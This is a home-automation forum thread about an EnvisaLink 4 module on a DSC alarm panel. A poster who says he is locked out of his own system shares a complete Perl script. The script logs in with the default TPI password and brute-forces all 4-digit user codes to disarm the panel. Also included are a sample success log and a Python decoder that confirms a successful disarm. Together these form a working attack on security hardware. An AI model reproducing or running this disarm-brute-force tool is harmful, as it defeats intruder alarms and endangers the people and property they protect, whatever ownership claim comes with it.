EVL 4, DSC and lost installer code - hacking my own system

Information and support for EnvisaLink modules.


mikep
Posts: 138
Joined: Wed May 30, 2012 1:49 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby mikep » Fri Jan 21, 2022 10:03 am

The 5108A response seems to indicate the panel has been armed in stay mode.
671 says the function isn't available (maybe a response to the *8 to enter installer programming while armed).
652 says the partition has been armed; it looks to be in stay mode.
DscServer for android/linux/windows: https://sites.google.com/site/mppsuite/dscserver

K-Man
Posts: 137
Joined: Fri Jun 01, 2012 1:08 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby K-Man » Fri Jan 21, 2022 10:41 am

Yeah, MikeP has it right. You can't go into installer mode with the panel armed. You need to disarm all partitions on DSC systems to enter installer mode.

homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby homediy » Fri Jan 21, 2022 2:27 pm

mikep wrote:The 5108A response seems to indicate the panel has been armed in stay mode.
671 says the function isn't available (maybe a response to the *8 to enter installer programming while armed).
652 says the partition has been armed; it looks to be in stay mode.

K-Man wrote:Yeah, MikeP has it right. You can't go into installer mode with the panel armed. You need to disarm all partitions on DSC systems to enter installer mode.


Thanks MikeP and K-Man, this is very helpful!!

So here's my situation: I bought a preowned home and inherited the already installed DSC system, which was disarmed. I was given a code (assuming it's a user code), but as of today it didn't work. The system was disarmed, but after my d*cking around I accidentally armed it, and trying the code passed on to me didn't work; the panel didn't accept it.

Thanks for indicating that I need to disarm first before I can get into the system. So now I'm thinking:

1. Modify the script to brute force (to identify any code) that would disarm the system/partition (not sure what command/codes to send).
2. Run the original script to find my installer code?

Any help on what commands to send for the disarming code?

Also, is there somewhere that explains some of these HEX response codes?

My last resorts:
1. try hardwire factory reset (which means I need to learn how to reprogram existing system setup). Any reference on how to re-program would be helpful.
2. buy a new PC1616 board and replace it.


TIA!!

GrandWizard
Posts: 2143
Joined: Tue Nov 16, 2010 4:08 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby GrandWizard » Sun Jan 23, 2022 10:01 am

If you can't find a valid user code then you will have to factory default the panel unfortunately.

homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby homediy » Wed Jan 26, 2022 8:23 pm

Could I modify the script to brute force by simulating keypresses to disarm the partition with a user code?

Something like this:
1. Send command 040 + 1<usercode>
2. Look for a response code of 650, 655 or 750 (any other response code would indicate a failure)
(loop again if not 650, 655 or 750)


Two things I'm uncertain about:
1. I'm not too sure whether to use 040 or 071.
2. Physically on a keypad it says enter your user code to disarm; if incorrect, enter "#" followed by the next user code. Do I need to simulate the "#" in code if the previous code is incorrect?

homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby homediy » Sat Jan 29, 2022 5:03 pm

To brute force to find my installer code I had to disarm my system first (I was given the wrong user code). I managed to figure out what commands to send and modified the shared script to brute force for a user code.
The only issue in my script is that my IF statement at the end to catch the user code, if found, won't exit the loop; it just waits for more responses. But once I heard the successful "disarm" beep from my panel, I stopped my script manually.

The output when a user code is found looks like this:

Code:

[20220129_130242] DEBUG: Attempting 1234
[20220129_130242] sent data '071119479E\r\n' (length 12)
[20220129_130242] response: '5000712D\r\n' (length 10)
[20220129_130244] response: '51081FF\r\n' (length 9)
[20220129_130244] response: '750100018E\r\n' (length 12)
[20220129_130244] response: '6551D1\r\n' (length 8)
[20220129_130247] response: '6501CC\r\n' (length 8)
[20220129_130319] response: '60900332\r\n' (length 10)
[20220129_130319] response: '6531CF\r\n' (length 8)
[20220129_130320] response: '6100032A\r\n' (length 10)
[20220129_130321] response: '6501CC\r\n' (length 8)
[20220129_130326] response: '60900332\r\n' (length 10)
[20220129_130326] response: '6531CF\r\n' (length 8)
[20220129_130328] response: '6100032A\r\n' (length 10)
[20220129_130328] response: '6501CC\r\n' (length 8)


Here's my contribution (hope this helps in my situation):

Code:

#!/usr/bin/perl
###############################
# - taken from Installer brute force script
###############################
## http://forum.eyez-on.com/FORUM/viewtopic.php?f=6&t=5025

use strict;
use warnings;
use IO::Socket::INET;
use IO::Select;
use IO::Handle;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################
# This is the IP of your EnvisaLink
# eg. 192.168.0.X, 10.0.0.X, etc.
my $ip = "------ IP address here ----------------";

# This is your EnvisaLink TPI password.  The default is user if you haven't changed it.
my $password = "user";


# Range which you want to test (4-digit user codes)
my $code_start = 0;
my $code_end   = 9999;

# Seconds to listen for panel events after each keystroke string.  A wrong
# code may produce no reply at all, so this bounds the time spent per attempt
# instead of waiting forever on the socket.
my $attempt_window = 3;


###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on STDOUT
# force a flush after every write/print
$| = 1;

# Opens a new network socket on port 4025 (default TPI port of the EnvisaLink)
my $socket = IO::Socket::INET->new(
   PeerHost => $ip,
   PeerPort => '4025',
   Proto    => 'tcp',
) or die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n";

# Lets us wait for data with a timeout instead of blocking inside recv()
my $sel = IO::Select->new($socket);

# Start logging; autoflush the log file too so it never lags behind the screen
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;
OUT->autoflush(1);

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();                              # EnvisaLink greets with 505 3 (password request)

DSC_put(DSC_cmd("005", $password));     # 005 - network login

# The 500 005 acknowledge and the 505 login result may arrive in separate
# packets, so wait for the 505 line itself.  505 data: 0 = failed, 1 = success, 2 = timeout
my $login = DSC_get_ww('^505[012]', 5);
if    ($login =~ /^5051/m) { l0gt("DEBUG: Correct EnvisaLink password"); }
elsif ($login =~ /^5050/m) { l0gt("DEBUG: Incorrect EnvisaLink password"); exit(1); }
else                       { l0gt("DEBUG: Login timed out");                exit(1); }

my $t = time;

l0gt("DEBUG: ===================================");

l0gt("DEBUG: Start user code entry cycle");
l0gt("DEBUG: -----------------------------");
for (my $code = $code_start; $code <= $code_end; $code++) {

   my $scode = sprintf("%04d", $code);  # Pad code with leading 0s if <1000
   l0gt("DEBUG: Attempting $scode");

   # 071 = Send Keystroke String: partition number followed by the keys.
   # Keying a 4-digit code while the partition is armed disarms it, exactly
   # as on the physical keypad.  (040 is the dedicated Partition Disarm
   # Control command; this script uses 071 so it behaves like the keypad.)
   DSC_put(DSC_cmd("071", "1${scode}"));

   # A correct code produces (see the log excerpt above):
   #    655 (Partition Disarmed) and
   #    750 (User Opening, followed by partition and user number)
   # A wrong code produces 670 (Invalid Access Code) or nothing at all.
   # 609/610 (zone open/restored) and 650/653 (partition ready) are ordinary
   # status traffic, so they are not taken as evidence that the code worked.
   my $r = DSC_get_ww('^(655|750|670)', $attempt_window);

   if ($r =~ /^(655|750)/m) {
      l0gt("SUCCESS: $scode is the user code");
      l0gt("DEBUG: End user code entry cycle");
      last;
   }
   l0gt("DEBUG: $scode rejected (670 Invalid Access Code)") if $r =~ /^670/m;
   l0gt("                     ");
}

l0gt(sprintf("DEBUG: Finished in %.1f seconds", time - $t));

close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
   my $s = shift;
   l0g("[" . currenttime() . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
   my $s = shift;
   print "$s\n";
   print OUT "$s\n";
}

sub currenttime {
   my ($sec,$min,$hour,$mday,$mon,$year) = localtime(time);
   return sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec);
}

# TPI checksum: low byte of the sum of the ASCII values, as two hex digits
sub DSC_cs {
   my $cs = 0;
   $cs += ord($_) foreach (split //, shift);
   return sprintf("%.2X", $cs & 0xFF);
}

# Formats command: 3-digit command + data + checksum (CRLF is added by DSC_put)
sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd . DSC_cs($cmd);
}

# Reads whatever the EnvisaLink has sent, waiting up to $timeout seconds, and logs it.
# Returns undef if nothing arrived in time.  Dies if the TPI connection was closed:
# a blocking recv() on a closed socket returns "" forever, which a sleep/goto loop
# would spin on silently (the "just sits there" symptom).
sub DSC_get {
   my $timeout = shift;
   $timeout = 5 unless defined $timeout;
   return undef unless $sel->can_read($timeout);
   my $response = "";
   defined $socket->recv($response, 1024) or die "DEBUG: recv failed. REASON: $!\n";
   die "DEBUG: EnvisaLink closed the TPI connection\n" if $response eq "";
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) . ")");
   return $response;
}

# Waits up to $timeout seconds for a line matching $wanted (matched per line),
# logging everything received; returns all data seen in that window
sub DSC_get_ww {      # wait for specific data
   my ($wanted, $timeout) = @_;
   my $buf = "";
   my $deadline = time + $timeout;
   while ((my $left = $deadline - time) > 0) {
      my $chunk = DSC_get($left);
      last unless defined $chunk;
      $buf .= $chunk;
      last if $buf =~ /$wanted/m;
   }
   return $buf;
}

# Sends a command and logs it
sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   l0gt("sent data '$hreq' (length $size)");
}


Also, with this script I often found that after a few attempts the responses just stop coming, but the program doesn't end or throw an error; it just sits there. I'm not sure if my connection got cut/interrupted or something. Many times I had to stop the script, update it to a new start number and restart it where it left off. The STDOUT wasn't always being captured either, especially when it errors out like that.

So instead, modify l0gt and l0g to output to the screen only, and when you run the script, pipe it to tee to capture the output to a file. It guaranteed for me that what I see on the screen will also be in the output file.

Code:

perl <script file> | tee outputfile.txt
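Added example, not code from this thread, from EyezOn or from DSC: a small Python decoder for the TPI response lines that mikep read by eye earlier (5108A, 671, 652) and that fill the log excerpt above, answering the "somewhere that explains these HEX response codes" question. Every packet is a 3-digit command, ASCII data, and a two-hex-digit checksum (low byte of the sum of the ASCII values), which is exactly what the Perl DSC_cs() computes; the decoder refuses packets whose checksum does not match. The code-name table covers only the codes that occur in this thread; the log lines are copied from the post above, and the three packets at the end are constructed from mikep's shorthand, which omits the checksum. The disarmed_by() check is the success test the brute-force loop needs: 750 (User Opening) together with 655 (Partition Disarmed), rather than zone or ready events.

```python
import re

# Response codes that occur in this thread (DSC TPI command numbers); others are shown raw.
CODES = {
    "500": "Command Acknowledge",
    "502": "System Error",
    "505": "Login Interaction",
    "510": "Keypad LED State",
    "609": "Zone Open",
    "610": "Zone Restored",
    "650": "Partition Ready",
    "652": "Partition Armed",
    "653": "Partition Ready - Force Arming Enabled",
    "655": "Partition Disarmed",
    "670": "Invalid Access Code",
    "671": "Function Not Available",
    "750": "User Opening",
}
# 510 data is one byte of LED flags, bit 0 first
LED_BITS = ["Ready", "Armed", "Memory", "Bypass", "Trouble", "Program", "Fire", "Backlight"]
ARM_MODES = {"0": "Away", "1": "Stay", "2": "Away, no delay", "3": "Stay, no delay"}
LOGIN = {"0": "login failed", "1": "login successful", "2": "timeout", "3": "password request"}


def checksum(body):
    """Low byte of the sum of the ASCII values of body, as two upper-case hex digits."""
    return "%02X" % (sum(ord(c) for c in body) & 0xFF)


def frame(cmd, data=""):
    """Build a packet the way the Perl DSC_cmd() above does (CRLF is added on the wire)."""
    return cmd + data + checksum(cmd + data)


def parse(packet):
    """Split 'CCC<data>HH' into (cmd, data), refusing packets whose checksum is wrong."""
    packet = packet.strip()
    if len(packet) < 5:
        raise ValueError("packet too short: %r" % packet)
    body, cs = packet[:-2], packet[-2:]
    if checksum(body) != cs.upper():
        raise ValueError("bad checksum on %r, expected %s" % (packet, checksum(body)))
    return body[:3], body[3:]


def describe(cmd, data):
    """Human-readable meaning of one (cmd, data) pair."""
    name = CODES.get(cmd, "unknown code " + cmd)
    if cmd == "510":
        flags = int(data, 16)
        lit = [n for i, n in enumerate(LED_BITS) if flags & (1 << i)]
        return "%s: %s" % (name, ", ".join(lit) or "all off")
    if cmd == "505":
        return "%s: %s" % (name, LOGIN.get(data, data))
    if cmd in ("609", "610"):
        return "%s: zone %d" % (name, int(data))
    if cmd in ("650", "653", "655"):
        return "%s: partition %s" % (name, data)
    if cmd == "652":
        return "%s: partition %s, %s" % (name, data[:1], ARM_MODES.get(data[1:], data[1:]))
    if cmd == "750":
        return "%s: partition %s, user %d" % (name, data[:1], int(data[1:]))
    if cmd == "500":
        return "%s: command %s" % (name, data)
    return "%s: data %r" % (name, data)


def decode_log(log):
    """Decode every "response: '...'" packet in the brute-force script's log output."""
    decoded = []
    for line in log.splitlines():
        m = re.search(r"response: '([0-9A-Fa-f]+)", line)
        if m:
            cmd, data = parse(m.group(1))
            decoded.append((cmd, data, describe(cmd, data)))
    return decoded


def disarmed_by(decoded):
    """User number from 750 (User Opening) once 655 (Partition Disarmed) has also been
    seen; None if the partition never disarmed. Zone and ready events do not count."""
    user, disarmed = None, False
    for cmd, data, _ in decoded:
        if cmd == "750":
            user = int(data[1:])
        elif cmd == "655":
            disarmed = True
    return user if disarmed else None


# Log excerpt copied from the post above (the sent line is skipped; only responses are decoded)
THREAD_LOG = r"""
[20220129_130242] sent data '071119479E\r\n' (length 12)
[20220129_130242] response: '5000712D\r\n' (length 10)
[20220129_130244] response: '51081FF\r\n' (length 9)
[20220129_130244] response: '750100018E\r\n' (length 12)
[20220129_130244] response: '6551D1\r\n' (length 8)
[20220129_130247] response: '6501CC\r\n' (length 8)
[20220129_130319] response: '60900332\r\n' (length 10)
[20220129_130319] response: '6531CF\r\n' (length 8)
[20220129_130320] response: '6100032A\r\n' (length 10)
"""

if __name__ == "__main__":
    for cmd, data, text in decode_log(THREAD_LOG):
        print(cmd, data.ljust(6), text)
    print("disarmed by user:", disarmed_by(decode_log(THREAD_LOG)))
    # mikep's shorthand above omits the checksum; these are the full packets (constructed)
    for cmd, data in (("510", "8A"), ("652", "11"), ("671", "")):
        print(frame(cmd, data), "->", describe(*parse(frame(cmd, data))))
```

Run as-is to see the excerpt decoded: the 510 with data 81 is Ready plus Backlight, the 750 names user 1 as the one who disarmed partition 1, and mikep's 5108A comes out as Armed, Bypass and Backlight, which is why it reads as stay arming. Two things worth keeping in mind: the checksum is an integrity check only, not authentication, and the TPI password sent with command 005 is the sole gate on this interface, so anyone on the LAN who can reach port 4025 with that password can key codes at the panel just as this script does.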

